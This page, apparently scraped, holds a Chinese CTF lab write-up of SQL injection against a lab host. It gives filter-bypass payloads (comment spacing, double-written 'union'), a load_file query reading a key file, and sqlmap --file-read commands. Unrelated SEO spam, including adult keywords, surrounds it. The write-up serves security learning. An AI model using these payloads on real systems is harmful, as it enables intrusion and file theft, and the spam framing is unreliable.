国产亚洲精品福利在线无卡一,国产精久久一区二区三区,亚洲精品无码国模,精品久久久久久无码专区不卡

當(dāng)前位置: 首頁 > news >正文

怎樣做網(wǎng)站首頁圖片變換seo研究中心培訓(xùn)機(jī)構(gòu)

怎樣做網(wǎng)站首頁圖片變換,seo研究中心培訓(xùn)機(jī)構(gòu),如何做像京東淘寶那樣的網(wǎng)站,泉州網(wǎng)站建設(shè)優(yōu)化url:http://192.168.154.253:81/ #打開http://XXX:81/,XXX為靶機(jī)的ip地址 審題 1、打開題目看到有一個(gè)提示,此題目需要通過SQL注入漏洞讀取/tmp/360/key文件,key在這個(gè)文件中 2、開始答題 發(fā)現(xiàn)這里url中有一個(gè)id的參數(shù)&#xff0…

url:http://192.168.154.253:81/? #打開http://XXX:81/,XXX為靶機(jī)的ip地址

審題

1、打開題目看到有一個(gè)提示,此題目需要通過SQL注入漏洞讀取/tmp/360/key文件,key在這個(gè)文件中

2、開始答題

發(fā)現(xiàn)這里url中有一個(gè)id的參數(shù),并且給出了當(dāng)前所執(zhí)行的sql語句

第一步:判斷注入點(diǎn)

1、?id=1'

2、?id=1'and'1'='1

第二步:判斷語句模板

1、使用 order by 判斷語句模板列數(shù)

發(fā)現(xiàn)語句在執(zhí)行中過濾了空格還過濾了“#”

執(zhí)行失敗:

?id=1'and'1'='1'order by 3#

?id=1'and'1'='1'order+by+3#

執(zhí)行成功:

?id=1')and'1'='1'order/**/by/**/3%23

解釋:

?id=1')and'1'='1'order/**/by/**/3%23

  • ')用來閉合前面的語句,order/**/by/**/3%23(order by 3)用來查詢模板列數(shù)
  • /**/(用注釋的方式代替空格),%23(使用url編碼代替#

2、判斷出語句模板有4個(gè)字段

回顯正常:

?id=1')and'1'='1'order/**/by/**/4%23? #執(zhí)行 order by 4 的時(shí)候回顯正常

回顯不正常:

?id=1')and'1'='1'order/**/by/**/5%23? #執(zhí)行 order by 5 的時(shí)候回顯不正常

第三步:找回顯點(diǎn)

回顯不正常:

?id=1')and'1'='2'union/**/select/**/1,2,3,4%23

思路:使用 and 1=2 報(bào)錯(cuò)找回顯點(diǎn)

回顯正常:

?id=1')and'1'='2'uunionnion/**/select/**/1,2,3,4%23

思路:由于過濾了union,所以這里使用雙寫的方式經(jīng)行過濾繞過,并且判斷出回顯點(diǎn)有3個(gè)(語句模板中的234位置均為回顯點(diǎn))

第四步:拿到flag

執(zhí)行成功:

?id=1')and'1'='2'uunionnion/**/select/**/1,database(),load_file('/tmp/360/key'),user()%23

解釋:

—— 1')and'1'='2'union/**/select/**/1,database(),load_file('/tmp/360/key'),user()#')

  • database() #當(dāng)前數(shù)據(jù)庫名
  • user() #當(dāng)前數(shù)據(jù)庫用戶名
  • load_file('/tmp/360/key') #讀取服務(wù)器文件

擴(kuò)展:使用sqlmap一把梭哈

1、由于前面判斷出了此題注入點(diǎn)存在過濾空格的情況,所以在使用sqlmap的時(shí)候需要指定腳本(用注釋/**/替換空格字符' ':--tamper "space2comment.py")運(yùn)行

命令:

  • python sqlmap.py -u "http://192.168.154.253:81/vulnerabilities/fu1.php?id=1" --tamper "space2comment.py" #我用的是sqlmap.py腳本所以使用python執(zhí)行,用kali就直接用第二條命令就行
  • sqlmap -u "http://192.168.154.253:81/vulnerabilities/fu1.php?id=1" --tamper "space2comment.py"

命令:

  • python sqlmap.py -u "http://192.168.154.253:81/vulnerabilities/fu1.php?id=1" --tamper "space2comment.py" --file-read "/tmp/360/key" ?#我用的是sqlmap.py腳本所以使用python執(zhí)行,用kali就直接用第二條命令就行
  • sqlmap -u "http://192.168.154.253:81/vulnerabilities/fu1.php?id=1" --tamper "space2comment.py" --file-read "/tmp/360/key" ?

2、獲取到flag

http://m.aloenet.com.cn/news/43132.html

相關(guān)文章:

  • 做俄羅斯外貿(mào)的網(wǎng)站設(shè)計(jì)網(wǎng)址域名ip查詢
  • 潮汕網(wǎng)站建設(shè)antnw網(wǎng)頁設(shè)計(jì)需要學(xué)什么
  • 網(wǎng)站加速服務(wù)武漢seo網(wǎng)絡(luò)優(yōu)化公司
  • 做網(wǎng)站的學(xué)什么代碼海外推廣服務(wù)
  • 麗水微信網(wǎng)站建設(shè)哪家好滄州網(wǎng)絡(luò)推廣公司
  • 建立網(wǎng)站的詳細(xì)步驟營銷模式有哪些 新型
  • 香港空間建網(wǎng)站百度一下百度網(wǎng)頁版
  • html網(wǎng)站要怎么做簡單制作html靜態(tài)網(wǎng)頁
  • 眉山市住房和城鄉(xiāng)建設(shè)局網(wǎng)站西安推廣平臺排行榜
  • 還有哪些免費(fèi)的網(wǎng)站可以做H5優(yōu)化推廣什么意思
  • 南京響應(yīng)式網(wǎng)站制作搜索引擎營銷案例有哪些
  • 1高端網(wǎng)站建設(shè)百度sem競價(jià)托管公司
  • 做美食的網(wǎng)站有那一些2345中國最好的網(wǎng)址站
  • 云南網(wǎng)站做的好的公司自己怎么免費(fèi)做百度推廣
  • 做網(wǎng)站用哪些語言seo是什么縮寫
  • 網(wǎng)站推廣結(jié)束語長沙網(wǎng)站優(yōu)化公司
  • 網(wǎng)站后臺密碼忘了全國人大常委會
  • 在godaddy做網(wǎng)站貴嗎在線識別圖片
  • 做網(wǎng)站是怎么賺錢的違法百度關(guān)鍵詞搜索趨勢
  • 網(wǎng)站設(shè)計(jì)多少錢一個(gè)優(yōu)化設(shè)計(jì)一年級下冊數(shù)學(xué)答案
  • 夜間正能量不良網(wǎng)站入口不用下載什么是搜索關(guān)鍵詞
  • 網(wǎng)站建設(shè)案例簡介怎么寫西安百度關(guān)鍵詞推廣
  • 上海青浦房地產(chǎn)網(wǎng)站建設(shè)太原做網(wǎng)站的工作室
  • 營銷型企業(yè)網(wǎng)站項(xiàng)目策劃表武漢seo 網(wǎng)絡(luò)推廣
  • app下載官方網(wǎng)站seo軟件簡單易排名穩(wěn)定
  • 人與狗做的電影網(wǎng)站西安專業(yè)seo
  • 東莞建站怎么做360手機(jī)優(yōu)化大師下載
  • 太原seo計(jì)費(fèi)管理seo專業(yè)術(shù)語
  • 美國優(yōu)秀網(wǎng)站教你如何建立網(wǎng)站
  • 有人做網(wǎng)站花了10幾萬產(chǎn)品推廣方法